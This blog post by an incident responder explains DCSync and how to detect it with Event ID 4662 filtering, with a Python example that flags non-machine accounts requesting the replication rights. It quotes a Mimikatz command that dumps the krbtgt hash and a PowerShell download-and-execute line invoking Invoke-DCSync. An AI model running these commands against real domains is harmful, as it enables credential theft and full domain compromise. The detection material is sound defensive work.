One of the cooler parts of my job is analyzing adversary activity from incident response engagements to better understand how adversaries carry out their operations, identify trends, and create detections to identify malicious activity either before, during, or after an incident.

If you aren't familiar with DCSync, it was implemented in Mimikatz (authored by Benjamin Delpy and Vincent Le Toux) back in 2015.

"DCSync" allows an adversary to masquerade as a domain controller and remotely retrieve password hashes from other domain controllers without executing any code on the target domain controller.

To be executed, the adversary must have access to a domain resource with domain replication privileges, specifically "Replicating Directory Changes", "Replicating Directory Changes All", and (sometimes) "Replicating Directory Changes In Filtered Set". By default, domain controllers, domain administrators, and enterprise administrators have these privileges granted.

An adversary who compromised an account with adequate permissions would load Mimikatz and run a DCSync command like this:

lsadump::dcsync /domain:dc.dwyer.local /user:krbtgt

Powershell -exec Bypass -c "IEX (New-Object Net.WebClient).DownloadString('') Invoke-DCSync -PWDumpFormat"

In this example, the target account would be the KRBTGT account, which is used to encrypt and sign Kerberos tickets within a domain.

DCSync leverages the MS-DRSR protocol via the DSGetNCChanges method, which is responsible for replicating Naming Context updates.

Note: In my research, network-based detections continue to be the best way to detect DCSync, given that you can key in on a specific protocol, but that kind of data hasn't been available during most of the IRs I have been involved with.

For more information regarding DCSync and Mimikatz, I recommend visiting Benjamin Delpy's blog and GitHub.

If you do some Googling on DCSync detections, you will likely come across a Windows Event Log detection focusing on Event ID 4662, and this is the one I wanna talk about today. I'd link you right to the repo, but I also don't want to get anyone in trouble for clicking a link with the word "mimikatz" in it :)

On domain controllers, Event ID 4662 is logged when an operation is performed on an object within Active Directory. This event is perfectly normal when objects are changed or when domain controllers need to replicate changes to other domain controllers.

In the case of a DCSync command, the adversary leverages the DS-Replication-Get-Changes-All extended right within the Domain-DNS class to request data to replicate to a user or system that is not a domain controller so that they can carry out their evil deeds.

The standard method to detect DCSync activity from event log analysis is to analyze Event ID 4662 events where the Object Server is "DS" and the Properties contain "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" (DS-Replication-Get-Changes-All) and "19195a5b-6da0-11d0-afd3-00c04fd930c9" (Domain-DNS class WRITE_DAC), but the associated account name is not a machine account (this is most commonly filtered by looking for account names that do not end with "$").
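To make the Event ID 4662 filter concrete, here is an added example (my code, not from the post or from the Mimikatz project) that applies the logic above to a few constructed event records laid out like Windows Event XML. The account names, the event template and the unrelated GUID in the third record are made up for the demonstration.

```python
import xml.etree.ElementTree as ET

# GUIDs named in the post: the extended right and the class it is requested on.
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed record template in the Windows Event XML layout (not a real capture).
TEMPLATE = (
    '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
    "<System><EventID>{eid}</EventID></System>"
    '<EventData><Data Name="SubjectUserName">{subject}</Data>'
    '<Data Name="ObjectServer">{server}</Data>'
    '<Data Name="Properties">{props}</Data></EventData></Event>'
)

def make_event(eid, subject, server, props):
    return TEMPLATE.format(eid=eid, subject=subject, server=server, props=props)

def parse_event(xml_text):
    """Return (event_id, {Data Name: value}) from one event record."""
    root = ET.fromstring(xml_text)
    eid = int(root.find("e:System/e:EventID", NS).text)
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return eid, data

def is_dcsync_candidate(xml_text):
    """The 4662 logic from the post: Object Server 'DS', both replication GUIDs in
    Properties, and a subject that is not a machine account (no trailing '$')."""
    eid, d = parse_event(xml_text)
    if eid != 4662 or d.get("ObjectServer") != "DS":
        return False
    props = d.get("Properties", "").lower()
    if DS_REPLICATION_GET_CHANGES_ALL not in props or DOMAIN_DNS_CLASS not in props:
        return False
    return not d.get("SubjectUserName", "").endswith("$")

def flagged_subjects(events):
    """Subject account names of the matching records, in log order."""
    return [parse_event(e)[1]["SubjectUserName"] for e in events if is_dcsync_candidate(e)]

# Constructed sample log: a replication request by a user account (alert), the same
# request by a domain controller's machine account (suppressed), and a routine write
# whose Properties carry a made-up unrelated GUID (no alert).
REPL_PROPS = "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"
SAMPLE_EVENTS = [
    make_event(4662, "jdoe", "DS", REPL_PROPS),
    make_event(4662, "DC02$", "DS", REPL_PROPS),
    make_event(4662, "jdoe", "DS", "{11111111-2222-3333-4444-555555555555}"),
]

print(flagged_subjects(SAMPLE_EVENTS))  # ['jdoe']
```

The trailing "$" filter is what suppresses the domain controllers' own replication, so a compromised machine account would be suppressed along with them; an allowlist of the known DC computer accounts is the tighter form of the same check.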